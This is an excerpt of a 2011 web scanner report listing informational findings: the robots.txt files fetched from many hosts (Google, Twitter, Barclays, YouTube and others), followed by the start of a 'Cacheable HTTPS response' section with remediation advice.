Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...

29.70. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translatewiki.net
Path:   /wiki/MediaWiki:Collapsible-collapse/en

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translatewiki.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3314333969"
Last-Modified: Sat, 04 Sep 2010 09:42:24 GMT
Content-Length: 314
Connection: close
Date: Tue, 03 May 2011 13:27:43 GMT
Server: lighttpd/1.4.26

User-agent: *
Disallow: /wiki/Special:
Disallow: /w/
Disallow: /sandwiki/
Disallow: /sw/
Disallow: /awstats
Disallow: /temp/
Disallow: /mewiki/
Disallow: /xbox/
Crawl-delay: 5

User-agent: MSNBot
Craw
...[SNIP]...

29.71. http://trends.atipat.co.cc/thailand-breast-slap/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trends.atipat.co.cc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Set-Cookie: PHPSESSID=932da9f2d0ca2ce621add627a5846250; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://trends.atipat.co.cc/sitemap.xml.gz

29.72. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.popcrunch.com
Path:   /snl-commercials-barkleys-bank-peepers-insurance-video/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tv.popcrunch.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Vary: Cookie
X-Pingback: http://tv.popcrunch.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.73. http://twitter.com/ktb_care  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ktb_care

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:50 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304429270999270; path=/; expires=Tue, 10-May-11 13:27:50 GMT; domain=.twitter.com
Last-Modified: Thu, 28 Apr 2011 17:20:38 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 13:27:50 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

29.74. http://v13.lscache4.googlevideo.com/videoplayback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://v13.lscache4.googlevideo.com
Path:   /videoplayback

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: v13.lscache4.googlevideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 09 Apr 2010 18:43:19 GMT
Date: Tue, 03 May 2011 13:27:55 GMT
Expires: Tue, 03 May 2011 13:27:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 26
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

29.75. http://validator.w3.org/check  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://validator.w3.org
Path:   /check

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: validator.w3.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:05 GMT
Server: Apache/2
Last-Modified: Mon, 14 Feb 2011 15:48:01 GMT
ETag: "1858d-5c-49c3ff8fc4e40"
Accept-Ranges: bytes
Content-Length: 92
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#
# robots.txt for validator.w3.org
#

User-agent: *
Disallow: /check
Disallow: /feed/check

29.76. http://video.google.com/videoplay%3Fdocid%3D4479130566581116930&rct=j&sa=X&ei=qeq_Tfr2CsOTtweWz5GlBQ&ved=0CG4QwQ0&q=Krung+Thai+Bank&usg=AFQjCNFRaUm-pTmcyp71nTEaQ8bjdxaWkg/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /videoplay%3Fdocid%3D4479130566581116930&rct=j&sa=X&ei=qeq_Tfr2CsOTtweWz5GlBQ&ved=0CG4QwQ0&q=Krung+Thai+Bank&usg=AFQjCNFRaUm-pTmcyp71nTEaQ8bjdxaWkg/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 01:04:23 GMT
Expires: Wed, 02 May 2012 01:04:23 GMT
X-Content-Type-Options: nosniff
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 00:14:39 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 44623

User-agent: *
Allow: /?cat=
Disallow: /?
Disallow: /docinfo
Disallow: /playrelated
Disallow: /related
Disallow: /stats
Allow: /support
Disallow: /s
Disallow: /timedtext
Disallow: /url
Allow: /videopla
...[SNIP]...

29.77. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webcache.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:28:08 GMT
Expires: Tue, 03 May 2011 13:28:08 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.78. http://webmail.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.aol.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webmail.aol.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Tue, 17 May 2011 13:29:08 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:29:07 GMT
Connection: keep-alive
Content-Length: 123

#
# robots.txt for http://webmail.aol.com
#

User-agent: *
Disallow: /messages
Disallow: /helplet
Disallow: /images

29.79. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wiki.answers.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain; charset=utf-8
Content-Length: 627
Date: Tue, 03 May 2011 13:29:13 GMT
X-Varnish: 598901023 570498259
Age: 189076
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0

User-Agent: *
Allow: /
Disallow: /Q/Special:CommunityForum
Disallow: /Q/Special:SupersForum
Disallow: /Q/UserDiscuss:
Disallow: /Q/Special:Logs&target=Deletion_log
Disallow: /Q/Special:Search
Disallow
...[SNIP]...

29.80. http://wikimediafoundation.org/wiki/Special:Landingcheck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Special:Landingcheck

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wikimediafoundation.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 12:20:50 GMT
Server: Apache
Last-Modified: Sat, 18 Apr 2009 13:54:29 GMT
ETag: "3f2c-467d4a2ce4f40"
Accept-Ranges: bytes
Content-Length: 16172
Content-Type: text/plain
Age: 4099
X-Cache: HIT from sq62.wikimedia.org
X-Cache-Lookup: HIT from sq62.wikimedia.org:3128
X-Cache: MISS from sq74.wikimedia.org
X-Cache-Lookup: MISS from sq74.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

29.81. http://wikipediareview.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikipediareview.com
Path:   /index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wikipediareview.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 04 Jun 2008 04:27:52 GMT
ETag: "6d2c037-1e-44ecfa6e40200"
Accept-Ranges: bytes
Content-Length: 30
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /wiki/

29.82. http://www.360travelguide.com/travel_guides.asp/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.360travelguide.com
Path:   /travel_guides.asp/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.360travelguide.com

Response

HTTP/1.1 200 OK
Content-Length: 313
Content-Type: text/plain
Last-Modified: Tue, 14 Dec 2010 18:21:55 GMT
Accept-Ranges: bytes
ETag: "6b2d1c9bb9bcb1:1dcd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:34:27 GMT
Connection: close

User-agent: *
Allow: /
Disallow: *...*
Disallow: *StartNum=R*
Disallow: */Europe/*
Disallow: */Africa/*
Disallow: */Asia/*
Disallow: */Australasia/*
Disallow: */Caribbean/*
Disallow: */Centra
...[SNIP]...

29.83. http://www.adobe.com/shockwave/download/download.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /shockwave/download/download.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Jan 2011 21:45:16 GMT
ETag: "501-fb4f1300"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 10:12:05 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/plain
Connection: close
Date: Tue, 03 May 2011 13:33:54 GMT
Age: 431
Content-Length: 1281

#
# This file is used to allow crawlers to index our site.
#
# List of all web robots: http://www.robotstxt.org/wc/active/html/index.html
#
# Check robots.txt at:
# http://www.searchengineworld.com/c
...[SNIP]...

29.84. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bangkokpost.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 28 Sep 2010 09:06:52 GMT
ETag: "17780cd-18-2a6b6300"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

29.85. http://www.barclays.com/privacy/com_privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclays.com
Path:   /privacy/com_privacy.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barclays.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:01 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304418121616328; path=/; expires=Wed, 27-Apr-33 10:22:01 GMT
Last-Modified: Thu, 07 Feb 2008 14:53:43 GMT
Accept-Ranges: bytes
Content-Length: 352
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /about
Disallow: /about.old
Disallow: /abovetheline
Disallow: /banner
Disallow: /css
Disallow: /ecd
Disallow: /feed
Disallow: /images
Disallow: /financialmanagement
Disallow: /
...[SNIP]...

29.86. http://www.bot.or.th/english/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bot.or.th
Path:   /english/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bot.or.th

Response

HTTP/1.1 200 OK
Content-Length: 32659
Content-Type: text/plain
Content-Location: http://www.bot.or.th/robots.txt
Last-Modified: Fri, 17 Oct 2008 07:06:44 GMT
Accept-Ranges: bytes
ETag: "a5b1e4e92630c91:5897"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:04 GMT
Connection: close

# No robots should visit any URL starting with /BOTHomepage/
User-Agent: *
Disallow: /bothomepage/
Disallow: /bothomepage/BankAtWork/
Disallow: /bothomepage/BankAtWork/Bond/Data/
Disallow: /botho
...[SNIP]...

29.87. http://www.coolthaihouse.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolthaihouse.com
Path:   /forum/viewtopic.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolthaihouse.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:30 GMT
Server: Apache/2.2.9 (Linux/SUSE)
Last-Modified: Thu, 01 Jun 2006 14:53:34 GMT
ETag: "80e3-2cb-4152ad50c3780"
Accept-Ranges: bytes
Content-Length: 715
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

# The Robots Exclusion Standard...
# All robots will spider the domain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /calendar/images/
Disallow: /adm
Disallow: /postcards/cards/
Disa
...[SNIP]...

29.88. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.216.61
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

29.89. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 03 May 2011 10:19:12 GMT
Expires: Tue, 03 May 2011 10:19:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

29.90. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:29:14 GMT
Expires: Tue, 03 May 2011 13:29:14 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.91. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:35:35 GMT
Expires: Tue, 03 May 2011 13:35:35 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.92. http://www.googleadservices.com/pagead/conversion/1045272592/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1045272592/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:33:21 GMT
Expires: Tue, 03 May 2011 13:33:21 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.93. http://www.independent.co.uk/news/world/asia/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /news/world/asia/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.independent.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:32 GMT
Last-Modified: Tue, 08 Mar 2011 10:23:42 GMT
ETag: "13113c6-425-1a5c780"
Accept-Ranges: bytes
Content-Length: 1061
Content-Type: text/plain; charset=UTF-8
Age: 356
Vary: Accept-Encoding,User-Agent
Connection: close

##ACAP version=1.0

# Site contents Copyright Independent New and Media Limited
# Please note our terms and conditions http://www.independent.co.uk/service/legal-terms-amp-policies-759573.html
# P
...[SNIP]...

29.94. http://www.mindworkscorp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindworkscorp.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mindworkscorp.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:44:19 GMT
Server: Apache
Last-Modified: Tue, 11 Jan 2011 19:39:21 GMT
ETag: "1765416-99-499973db790aa"
Accept-Ranges: bytes
Content-Length: 153
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /js
Disallow: /stats
Disallow: /CMS
Disallow: /usrfiles
Disallow: /cgi
Disallow: /_db_backups
Disallow: /css

Allow: /

29.95. http://www.multimap.com/clients/places.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multimap.com
Path:   /clients/places.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.multimap.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 21:36:26 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Cache-Control: public, max-age=15547807
Date: Tue, 03 May 2011 13:41:27 GMT
Connection: close
Content-Length: 1879

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

29.96. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/ajaxConfig1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /nbcuniversalstore/behavior/ajaxConfig1.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbcuniversalstore.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain
Expires: Tue, 03 May 2011 13:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:53 GMT
Content-Length: 132
Connection: close
Set-Cookie: SESSID=e34b604888a6d297f0c68cf9e837abb1; expires=Tue, 03-May-2011 21:32:53 GMT; path=/; domain=nbcuniversalstore.com
Set-Cookie: DASHORTNAME=nbcuniversalstore; expires=Wed, 31-Aug-2011 13:32:53 GMT; path=/; domain=nbcuniversalstore.com
Set-Cookie: DAABTEST=B; expires=Wed, 31-Aug-2011 13:32:53 GMT; path=/; domain=nbcuniversalstore.com

User-agent: *
Disallow: /cart.php
Disallow: /checkout.php
Disallow: /account.php
Disallow: /register.php
Disallow: /orderlookup.php

29.97. http://www.newsroom.barclays.com/content/Detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /content/Detail.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsroom.barclays.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/plain
Date: Tue, 03 May 2011 10:21:45 GMT
Accept-Ranges: bytes
ETag: "0cb4f1313dac91:0"
Connection: close
Last-Modified: Thu, 21 May 2009 12:53:02 GMT
X-Powered-By: ASP.NET
Content-Length: 326

User-agent: *
Disallow: /00_text/
Disallow: /00_utilities/
Disallow: /admin/
Disallow: /App_Data/
Disallow: /App_GlobalResources/
Disallow: /App_Themes/
Disallow: /Backstage/
Disallow: /bin/

...[SNIP]...

29.98. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /sem/g/content/pt-wireless/070610

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scriptlogic.com

Response

HTTP/1.1 200 OK
Content-Length: 461
Content-Type: text/plain
Last-Modified: Wed, 27 Oct 2010 14:29:04 GMT
Accept-Ranges: bytes
ETag: "84f484ee375cb1:6a7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:42:22 GMT
Connection: close


User-agent: *
Disallow: /_private/
Disallow: /_commonfiles/
Disallow: /go/
Disallow: /google/
Disallow: /membership/
Disallow: /Eval/
Disallow: /eng/Quotes/
Disallow: /eng/reseller/
Disallo
...[SNIP]...

29.99. http://www.sedoparking.com/search/registrar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sedoparking.com
Path:   /search/registrar.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sedoparking.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:42:10 GMT
Server: Apache
Last-Modified: Thu, 06 Nov 2008 14:07:45 GMT
ETag: "70-45b05d21e2e40"
Accept-Ranges: bytes
Content-Length: 112
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
X-Cache: MISS from 706786
Connection: close

# parking, see cvs for comments
User-agent: IPS-Agent
Disallow: /parking.php4

User-agent: *
Disallow: /search/

29.100. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thailandhotelforums.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:13 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
Last-Modified: Sat, 08 Mar 2008 16:45:07 GMT
ETag: "331f13d-130-47d2c293"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

29.101. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:33:57 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 19:31:59 GMT
ETag: "21b-49c06c06dc9c0"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

29.102. http://www.zlmc.org/mindfulness-meditation.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zlmc.org
Path:   /mindfulness-meditation.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zlmc.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:02 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 04 Mar 2010 18:19:19 GMT
ETag: "145-480fda32477c0"
Accept-Ranges: bytes
Content-Length: 325
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30. Cacheable HTTPS response  previous  next
There are 19 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


30.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

Request

GET /chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027 HTTP/1.1
Host: apps.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; ssuserid=173.193.214.243.1304418119808638; mbox=check#true#1304436224|session#1304436163124-351101#1304438024;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:57:11 GMT
Server: Apache
Content-Length: 149
Connection: close
Content-Type: text/html

<html>
<body onLoad="document.redirect.submit()">
<form name="redirect" action="../webchat/chat_client_skin.php" method="get"></form>
</body>
</html>

30.2. https://csc.scb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://csc.scb.co.th
Path:   /

Request

GET / HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:47 GMT
Content-Length: 189
Content-Type: text/html
Content-Location: https://csc.scb.co.th/Default.htm
Last-Modified: Fri, 08 Aug 2008 19:05:45 GMT
Accept-Ranges: bytes
ETag: "61a9ddc289f9c81:1334"
Server: Microsoft-IIS/6.0

<html>
<Script language="Javascript">
function redirect()
{
